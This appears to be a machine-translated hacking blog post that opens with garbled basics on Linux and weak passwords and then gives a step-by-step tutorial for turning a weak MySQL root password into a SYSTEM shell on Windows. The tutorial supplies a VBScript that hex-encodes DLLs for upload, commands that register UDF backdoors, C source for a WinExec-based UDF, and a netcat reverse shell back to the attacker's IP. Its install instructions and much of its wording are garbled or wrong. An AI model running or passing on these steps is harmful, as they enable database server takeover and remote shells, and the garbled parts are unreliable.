Linux and weak passwords, big guy don't squirt

1. What is Linux?

Linux is a free-to-use and free-to-propagate Unix-like operating system, a POSIX and Unix-based multiuser, multitasking, multi-threaded and multi-CPU operating system. It can run major UNIX tools software, applications, and network protocols. It supports 32-bit and 64-bit hardware. Linux inherits the design idea of Unix as the core of network, and is a stable multi-user network operating system. "Personal prefer Linux"

2. How do I install Linux?

First, download Ubutu Linux system, here will not give the URL, we search for it.

Second, pay attention to their operating system is 32-bit or 64-bit, need to download the corresponding version yo.

Three, after downloading, extract to an empty disk inside, find EXE file open.

Four, pop-up dialog box.

Five, pay attention to choose the installation path.

Six, click Install, OK!

3. What is a weak password?

Weak passwords (weak password) are not strictly and accurately defined, and are often considered weak passwords that are easily guessed or cracked by someone else (they might know you well). A weak password is a password that contains only simple numbers and letters, such as "123", "ABC", etc., because such a password is easily cracked by others, thus making the user's computer at risk.

4. How can I get system permissions through MySQL weak password?

First of all, let me briefly say MySQL weak password to get the system permissions process: First use the MySQL script upload udf dll file, and then use the Register UDF DLL in the self-written function functions, and execute arbitrary command.

The idea is very simple, there are some tutorials on the net, but they either did not give the specific code, or a word, make like I like to have a side dish difficult to understand, finally in my days have to constantly test hard work, have a bit of results, I put the detailed process and related code to everyone, so that everyone can write DLL file , you create a different file binary code!

Next, let's start by saying how to generate a binary file to upload a script. Take a look at this MySQL script code (User mix method):

Set @a = Concat (", 0x0123abc1312389 .....);

Set @a = Concat (@a,0x4658978abc545e ...);

......................

CREATE TABLE Mix (data Longblob);//Build Form mix, field data, type Longblob

INSERT into mix values (""); Update mix SET data = @a;//@a Insert Table Mix

Select data from Mix to DumpFile ' c:\\winnt\\ filename ';//export table contents as file

The first two sentences are very familiar, this is the time we injected before, bypassing the "solution, the code of 16 to declare a variable, and then import this variable on the line." Just here, because the 16 code is the content of a file, the code is too long, so we used the CONCAT function to add the last time the code class, so that constantly accumulated into a variable a. The following sentence is very simple, I have comments.

The following three sentences say, but the front of so many 16 data, manual words, tiring Ah! But do you remember having a exe2bat.vbs script before? This time we can change this script to get the MySQL script we need here! Comparing Exe2bat.vbs generated files with the file format we need to script, we can easily get the script we need. The script reads as follows:

Fp=wscript.arguments (0

Fn=right (Fp,len (FP)-instrrev (FP, "\"))

With CreateObject ("ADODB.stream")

. Type=1:.open:.loadfromfile Fp:str=.read:sl=lenb (str)

End With

SLL=SL MoD 65536:slh=sl\65536

With CreateObject ("Scripting.FileSystemObject"). OpenTextFile (fp& ". txt", 2,true)

. write "Set @a = Concat (", 0x "

For I=1 to SL

BT=ASCB (MidB (str,i,1))

If Bt<16 then. Write "0"

. Write Hex (BT)

If I mod 128=0 then. write ")," vbCrLf "Set @a = Concat (@a,0x"

Next

End With

OK, now as long as you drag the file you want to upload to this script icon, you can generate a TXT file with the same name. This TXT file, is the MySQL script we need, of course, we need to modify this TXT file (after all, he is our jerry-made!) ), the last line generated the redundant sentence "Set @a = Concat (', 0x" deleted, plus the table, plug the three code can be worth it!

How is the script generated and uploaded? Log in to MySQL server first:

C:\>mysql–u root–h hostip–p

Mysql>use MySQL; Go to MySQL default database, or your next table will not know which library to belong to

Mysql>\. E:\*.dll.txt; Here is the MySQL script you generated

According to the above input command, you can see the screen text flashing fast (of course, speed is fast), will be your old file upload finished!

Below to reach our focus, what DLL files do we upload? As far as I can see online now there are two of the DLL files have been written, one is mix write Mix.dll, one is Envymask write My_udf.dll, these two I have used, are very good, but are also a bit inadequate. Let's take a look at the specific use process.

First Use Mix.dll:

Log in to MySQL and enter the command:

mysql> \. E:\mix.dll.txt;

mysql> CREATE FUNCTION mixconnect RETURNS STRING SONAME ' C:\\windows\\mix.dll ';

The registered Mixconnect here is the function implemented in our DLL file, we will use him to execute the system command!

Mysql> Select Mixconnect (' Your IP ', ' 8080 '); Fill in your Bounce IP and port

After a while, you listen to the 8080-port NC, you will get a system permissions Shell! 1:

This is really good, through the rebound to get the shell can pass some firewalls, unfortunately, its function is not well written, can only execute once, when you connect the database for the second time, run "Select Mixconnect (' Your IP ', ' 8080 ');" , the other side of MySQL will drop! Error, then service Stop!

So, using Mix.dll you have only one success and no chance to do it again! In addition, according to my test, he seems to have no effect on the Win2003 system.

Re-use My_udf.dll:

Mysql>\. C:\my_udf.dll.txt

mysql> CREATE FUNCTION my_udfdoor RETURNS STRING SONAME ' C:\\winnt\\my_udf.dll ';

Similarly, My_udfdoor is the function we use to execute system commands after registering

Mysql> Select My_udfdoor ("); Here we can write My_udfdoor parameters, equivalent to just activating this function.

Well, now you don't have to shut the shell, we'll open another cmd, using:

D:\>NC HostIP 3306

*

4.0.*-nt x$eo~mcg F**k//See this after, enter "F**k", he is the My_udfdoor default password, you cannot change

After a while, you'll have the shell of the system authority,

Because he is hook recv version, so the ability to wear the wall is very strong, I was in the last Mix.dll rebound failure situation, only use this, he really did not bear the hope! Into the system, found that it has two network cards, Skynet firewall personal version V2.73, external only open 3306 ports, this shows that My_udf.dll really have a strong ability to penetrate the firewall! But he also has a bug, that is, after we connect to activate the function (that is, using the command "select My_udfdoor (');" ), regardless of whether you are connected or not, just perform the following:

Mysql>drop function My_udfdoor; After that, MySQL also reports the error, and then hangs off,

So, you can't delete your traces using this DLL file!

Finally, we write ourselves a custom DLL file. See if we can solve the problem.

We just use the example of a MySQL UDF as a template! Look at his example:

#include <stdlib.h>

#include <winsock.h>

#include <mysql.h>

extern "C" {

Char *my_name (udf_init *initid, Udf_args *args, Char *is_null,

Char *error);

Compatible with C

}

Char *my_name (udf_init *initid, Udf_args *args, Char *is_null,

Char *error)

{

char * me = "my Name";

return me;

Calling this UDF will return my name

}

Pretty simple, huh? OK, we just need to change it a little bit to have our own DLL file:

Here's one of my buddies. Crackme is modified:

#include <stdlib.h>

#include <windows.h>

#include "mysql.h"

extern "C" __declspec (dllexport) char *sys_name (udf_init *initid, Udf_args *args, Char *is_null, char *error);//Sys_name is the function name, you can modify it arbitrarily

__declspec (dllexport) char *sys_name (udf_init *initid, Udf_args *args, Char *is_null, char *error)//Of course the sys_name here also has to be changed!

{

Char me[256] = {0};

if (Args->arg_count = = 1) {

strncpy (Me,args->args[0],args->lengths[0]);

me[args->lengths[0]]= ' + ';

WinExec (Me,sw_hide); is to use it to execute arbitrary commands.

}else

strcpy (Me, "do nonthing.\n");

return me;

}

OK, we'll compile it into a Sysudf.dll file! Let's experiment with him!

See Operation:

Mysql>\. C:\sysudf.dll.txt

Mysql>create function Sys_name returns string Soname ' C:\\windows\\sysudf.dll ';

Mysql>\. Nc.exe.txt//Upload the Nc.exe

Mysql>select sys_name (' nc.exe-e cmd.exe my IP 8080 ');

The Sys_name parameter has only one parameter that specifies the system command to execute

Well, look at a rebound shell in Win2003,

Of course, we can also not rebound shell, and to execute other commands, but regardless of whether the execution succeeds, are not echo, so make sure the command is well-formed. For this DLL file, after testing, no matter when "drop function sys_name;", will not be error, but also can run different commands multiple times. As for his shortcomings, his ability to wear the wall is not too strong as Mix.dll, but for the wall is not penetrating, direct operation of other commands is the best choice.

The above three DLL files can be a short, how to choose, depends on the actual situation you encountered.

Well, from script to write use to DLL file write use, say so much, now everyone should be? The problem is that the weak password to get the system permissions, but if you in the injection and other processes, burst the config.php in the MySQL password, not also can be used? Does this mean that we have also found another way to lift the power after serv-u?

Linux and weak passwords, big guy don't squirt